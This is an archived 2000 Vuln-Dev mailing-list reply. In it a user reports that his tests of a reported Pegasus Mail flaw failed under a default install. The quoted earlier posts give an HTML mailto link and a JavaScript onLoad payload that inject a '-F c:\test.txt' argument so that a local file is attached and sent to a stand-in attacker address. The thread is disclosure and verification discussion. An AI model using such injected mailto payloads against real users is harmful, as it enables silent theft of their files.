NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 2000-q4

Subject: Re: Pegasus Mail
From: Brad Griffin (b.griffinCQU.EDU.AU)
Date: Tue Oct 03 2000 - 19:19:24 CDT

Next message: Daniel Jacobowitz: "Re: Traceroute exploit details"
Previous message: Bernie Cosell: "Re: Pegasus Mail"
Maybe reply: Brad Griffin: "Re: Pegasus Mail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all. As a devotee of Pegasus mail, i figured this could be quite serious.
I therefore did some testing to see exactly what this 'bug' really could do.
I installed Pegasus as a single user default install on a system that has
never had Peg installed (NT4 sp6a). I cretae dan html file with each of the
proposed href links, created the test.txt file and also included a couple of
clickable 'mailtos' with paths to real life files.
Under a default install of Pegasus which sets Peg up as the default mailer
for IE, this does not work. Well, yes, the mailer pops up if running, but it
does not create or send a new message. This applies to the Javascript
'onload' tag and the clickable link. Maybe someone could post the details of
the exact configuration necessary for this to occur as described by Imran.
Cheers,
Brad

> -----Original Message-----
>
> very interesting as a little javascript can 'click' a link for you..
>
> <BODY onLoad="location.href='mailto:hackerhakersite.com -F
> c:\test.txt';">
>
> havent tested since i havent got pegasus mail, but it works
> for what i used
> it for earlier('clicking' the its:its:its. link)
>
> Med venlig hilsen
>
> Knud Erik Hojgaard <knudcybercity.dk>
> Cybercity Erhvervssupport <supporterhverv.cybercity.dk>
> http://www.cybercity.dk/support
>
> -----Original Message-----
>
> When using the following html,
>
> <a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
> here</a>
>
> When the user clicks on "Click here" Pegasus mail will
> automatically creates a message which has a copy of the file
> "c:\test.txt" and is addressed to "hackerhakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hackerhakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> As inorder to have files stolen the user would have to click on the
> dubious looking link, is this security risk serious ?
>
> Imran Ghory
>

Next message: Daniel Jacobowitz: "Re: Traceroute exploit details"
Previous message: Bernie Cosell: "Re: Pegasus Mail"
Maybe reply: Brad Griffin: "Re: Pegasus Mail"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]